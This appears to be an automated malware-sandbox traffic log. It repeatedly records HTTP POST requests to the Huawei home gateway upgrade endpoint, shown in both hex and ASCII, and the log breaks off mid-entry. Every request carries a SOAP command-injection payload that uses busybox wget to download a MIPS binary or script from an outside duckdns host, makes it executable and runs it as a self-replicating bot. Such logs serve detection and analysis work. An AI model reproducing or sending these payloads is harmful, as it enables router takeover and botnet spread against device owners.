            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 